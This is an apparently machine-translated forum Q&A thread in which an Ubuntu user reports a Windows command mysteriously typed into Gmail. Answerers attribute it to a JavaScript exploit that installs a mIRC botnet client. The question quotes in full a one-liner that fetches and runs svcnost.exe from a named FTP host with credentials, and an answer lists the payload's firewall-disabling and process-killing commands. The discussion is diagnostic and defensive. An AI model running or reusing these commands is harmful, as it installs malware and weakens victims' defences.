TO
字段中输入以下内容:md / c echo open cCTeamFtp.yi.org 21 >> ik&echo用户ccteam10 765824 >> ik&echo二进制文件>> ik&echo get svcnost.exe >> ik&echo bye >> ik&ftp -n -v -s:ik&del ik&svcnost.exe&exit
echo您已拥有
对我来说,这就像Windows命令行代码,并且
md
的代码开头与Gmail处于撰写模式这一事实表明,有人试图运行cmd
命令。我猜我很幸运,实际上我没有在这台PC上运行Windows,但是还有其他人可以运行。这是我第一次发生这样的事情。我不是Linux专家,并且当时我没有运行除Firefox之外的任何其他程序。我绝对确定我没有写过这篇文章,而且没有人在物理上在我的电脑上。另外,我最近将自己的Google密码(以及所有其他密码)更改为
vMA8ogd7bv
之类的密码,所以我不认为有人入侵了我的Google帐户。刚刚发生了什么?如果不是老太婆的老Windows计算机已经运行了多年恶意软件,而是最近安装了新的Ubuntu,有人会如何在我的计算机上敲击键盘?
更新:
让我解决一些问题要点和问题:
我在奥地利的乡下。我的WLAN路由器运行WPA2 / PSK和不在字典中的中等强度密码。必须是蛮力的,距离这里不到50米;它不太可能被黑客入侵。
我正在使用USB有线键盘,因此再也不太可能有人可以入侵它。
当时我没有使用计算机。我上班时只是在家里闲逛。这是一台安装在显示器上的台式计算机,因此我很少将其关闭。
这台计算机只有两个月的历史,只能运行Ubuntu,并且我没有使用奇怪的软件或访问奇怪的网站。主要是Stack Exchange,Gmail和报纸。没有游戏。 Ubuntu已设置为保持最新。
我不知道有任何VNC服务正在运行;我当然还没有安装或启用它。我也没有启动任何其他服务器。我不确定默认情况下是否在Ubuntu中运行任何计算机吗?
我知道Gmail帐户活动中的所有IP地址。我相当确定Google不是入门工具。
我找到了日志文件查看器,但不知道要查找什么。帮助吗?
我真正想知道的是,让我感到不安全的真正原因是:互联网上的任何人如何在我的机器上生成击键?我如何才能避免这种情况,而不必全神贯注呢?我不是Linux极客,而是父亲,对Windows已有20多年的困扰,对它感到厌倦。而且在上网的18多年中,我从未亲眼看到过任何黑客尝试,因此这对我来说是新的。
#1 楼
我怀疑您有什么需要担心的。很有可能是JavaScript攻击试图通过下载来驱动器。如果您担心这种情况的发生,请开始使用NoScript和AdBlock Plus Firefox插件。即使访问值得信赖的网站,您也不安全,因为它们运行来自第三方广告商的JavaScript代码,这可能是恶意的。 br />
我抓起它并在VM中运行它。它安装了mirc,这是状态日志... http://pastebin.com/Mn85akMk
这是一种自动攻击,试图让您下载mIRC并加入一个僵尸网络,该僵尸网络将您进入了一个spambot ...它使我的VM加入并连接到许多不同的远程地址,其中一个是
autoemail-119.west320.com
。在Windows 7中运行它,我必须接受UAC提示并允许它通过防火墙访问。
在其他论坛上似乎有大量关于此确切命令的报告,甚至有人说torrent文件在完成下载后便试图执行它...我不确定那怎么可能。
我自己还没有使用过,但是它应该能够向您显示当前的网络连接,以便您查看是否连接到某物。规范:http://netactview.sourceforge.net/download.html
评论
嗯,为什么所有注释(甚至是发现脚本试图打开cmd窗口的高度相关的注释)都被删除了!
– BlueRaja-Danny Pflughoeft
13年8月14日在23:24
如果我刚开始使用uBlock Origin,我会不会受到这种攻击?
–RobotUnderscore
17年1月30日在15:15
#2 楼
我同意@ jb48394的观点,认为这可能是JavaScript漏洞,就像最近这些事情一样。它试图打开
cmd
窗口(请参阅@torbengb的注释)并运行恶意命令,而不是只是在后台谨慎地下载了该木马程序,这表明它利用了Firefox中的某个漏洞,该漏洞使它可以输入击键,但不能运行代码。这也解释了为什么此漏洞利用程序(明确编写)专门用于Windows,也可以在Linux中工作:Firefox在所有操作系统中都以相同的方式运行JavaScript(至少,它尝试:))。如果它是由Windows上的缓冲区溢出或类似漏洞利用引起的,则它将导致程序崩溃。
关于JavaScript代码的来源-可能是恶意的Google广告(广告循环全天Gmail)。这不是第一次。
评论
不错的参考。
– kizzx2
2011年4月21日在11:30
仅供参考,对于撇油器,最后一个“链接”实际上是五个单独的链接。
– Pops
2011年4月21日在18:50
如果它确实是Javascript漏洞,那将非常令人震惊,因为我的Firefox通常会保持开放状态数天。但是,您需要调用特殊的API才能将密钥发送到Windows下的另一个系统,并且可能在Linux下发送另一个系统调用(如果存在)。由于发送击键不是正常的Javascript操作,因此我怀疑Firefox是否会为此实现跨平台调用。
–billc.cn
2011年7月21日在20:53
@ billc.cn:不管操作系统如何,我相信写PS / 2键盘缓冲区的工作原理都是一样的。
– BlueRaja-Danny Pflughoeft
2011年7月21日在21:30
#3 楼
我在另一台Linux机器上发现了类似的攻击。看来这是Windows的FTP命令。评论
更确切地说,它使用Windows ftp命令行工具下载并运行文件ftp:// ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe。
–user1686
2011年4月20日在18:38
也可以在pastebin上找到它pastebin.com/FXwRpKH4
– Shekhar
2011年4月20日在18:38
这是有关网站whois.domaintools.com/216.210.179.67的信息
– Shekhar
2011年4月20日在18:43
这是一个WinRAR SFX软件包,其中包含可移植的mIRC安装和名为“ DriverUpdate.exe”的文件。 DriverUpdate.exe执行(至少)两个外壳命令:netsh防火墙设置opmode disable和taskkill / F / IM VCSPAWN.EXE / T它还尝试(我认为)将die-freesms-seite.com添加到Internet Explorer可信区域和代理绕过。
–安德鲁·兰伯特(Andrew Lambert)
2011年4月20日在21:18
#4 楼
这不能解决您的全部问题,但是可以在日志文件中查找失败的登录尝试。如果日志中尝试失败的尝试超过五次,则有人试图破解
root
。如果在您离开计算机时成功尝试登录到root
,请立即更改密码!!我的意思是现在!最好是字母数字的东西,大约10个字符。收到的消息(
echo
命令)听起来确实像是一些不成熟的脚本小子。如果是真正的黑客知道他在做什么,那么您可能仍然不会知道。评论
我同意这显然是非常业余的。至少他们不应该在最后把你所有的回声放在首位。让我想知道是否曾经遇到过“真正的黑客”?或者实际上我应该问,有多少?
– Torben Gundtofte-Bruun
2011年4月21日在8:43
@torgengb:如果该命令在Windows命令提示符下运行,则不会看到回显(因为&exit)
– BlueRaja-Danny Pflughoeft
2011年4月25日在19:08
#5 楼
whois
报告west320.com由Microsoft拥有。UPnP和Vino(系统->首选项->远程桌面)加上一个弱的Ubuntu密码?
您是否使用过任何是非标准存储库吗?
DEF CON每年都会举办一次Wi-Fi竞赛,涉及可到达Wi-Fi接入点的距离-最后一次听说是250英里。
如果您真的想害怕,请查看Zeus僵尸网络的Command-n-Control中心的屏幕截图。没有机器是安全的,但是Linux上的Firefox比其他机器更安全。如果您运行SELinux,那就更好了。
评论
该漏洞的作者显然无意在Linux上运行此漏洞,因此我怀疑它与易受攻击的gnome实用程序或弱密码有关(此外,OP已经提到他具有安全密码)。
– BlueRaja-Danny Pflughoeft
2011年4月20日在22:11
实际上,他没有提到拥有Ubuntu密码,只有gmail和无线密码。一个运行metasploit的孩子可能甚至不了解Linux,他只是看到VNC。这很可能是JavaScript攻击。
– rjt
2012年6月17日下午4:21
评论
是否有其他人可以访问您的计算机,或者您的无线键盘很旧?此外,Ubuntu具有内置的VNC服务器。如果该命令处于活动状态,则可能已连接某个地方的随机脚本并假定它是Windows计算机,并发送了WIN + R,cmd击键...@torbengb:您的帖子真的吓到我了...
您的无线网络上还有其他计算机吗?如果入侵者破坏了他们的安全性,它将使他“进入”您的本地网络,这可能会导致以各种方式破解Ubuntu系统。
@muntoo ...并且'确保您没有在任何地方写下这些内容,也不要使用任何应用程序来管理它们,对吗?让我们不开始密码重击;至少我的密码不是密码:-)
你有猫吗?